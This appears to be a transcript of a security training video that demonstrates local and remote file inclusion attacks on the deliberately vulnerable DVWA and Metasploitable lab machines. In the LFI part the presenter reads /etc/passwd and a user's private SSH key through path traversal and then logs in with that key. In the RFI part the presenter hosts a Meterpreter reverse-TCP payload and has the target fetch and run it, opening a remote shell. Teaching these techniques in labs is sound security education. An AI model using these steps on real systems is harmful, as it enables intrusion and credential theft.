So here we are on DVWA, and here's the Apache server. I know it's Ubuntu, which means it's Linux, which means if I look for the /etc/passwd file, it will work. If I look for a Windows file, it won't work, because this is not a Windows box. Also, we're looking at PHP, and we're on Apache 2.2.8, and I also know the version of PHP here.
So I can see this page parameter is including include.php. With LFI, the ../ matters, because if I do this and it says /etc/passwd, this might not work. It really depends how far I go back, so you can just keep doing this manually. Again, this might take a long time, depending on how far back we have to go and how the PHP is written.
So now we see the /etc/passwd file. I'll view source and see how much nicer that is than in the slide. In the users, I see msfadmin, and because I know how Linux is structured and I'm looking at the msfadmin user, I'm going to tack on at the end here, instead of /etc/passwd, /home/msfadmin (which is that user, 1000) /.ssh/id_rsa. If they have their permissions configured wrong, I should be able to read it, and I can see here that it is misconfigured and I am able to view it. So now what do you do?
So again, I view source and grab this key, and what I'm going to do is make my own key file, msfadmin, and paste that private key information into it. I exit out of this, and you have to chmod it; you can do 400. Now what I should be able to do is ssh with the msfadmin key file to that box, as msfadmin, which I did. So now I'm on the box, because I used LFI to grab the SSH key.
So let's exit out of here, and let me show you what happens with RFI, remote file inclusion. Now, remember I need to be able to see if it can reach out to my server, so nc -lvp 4444, and I'll go back and change this to my server, http://<my IP>:4444. I see here that the connection was received. It's not looking for any file in particular, so I can name my file whatever I want to. I'm going to kill the connection here, and what I'm going to do is create that shell.txt file. Now you'll notice the payload is php/meterpreter/reverse_tcp, with my host as the LHOST and my LPORT as 4444, and we're going to make this into a .txt file. Like I said, sometimes when you make it a .php file, it will execute on your own server, and you're like, oh, this looks awfully familiar. Well, that's because it's your own server.
So the other thing to do is we want to set up Metasploit. You know, I like to execute things directly from the terminal here before actually loading the Metasploit framework, so I should have everything set up and ready to go. What I'll do now is set up a server on my own machine, so I'm going to use python3 -m http.server 8000, because that's where our server is running, on port 8000. All right, that's on port 8000; that's why I chose that. And you can see that Meterpreter session is opened. I see there it is, so if I interact with it, sessions -i 1, sysinfo, I see I'm on Metasploitable here.
So that's how to leverage both LFI, to find valuable information, in this case an SSH key that lets us ssh onto this machine, and RFI, where we host our own file and have the server reach out and execute our shell, so that now we're on the box here.
So those are file inclusion vulnerabilities, and that's how to exploit them.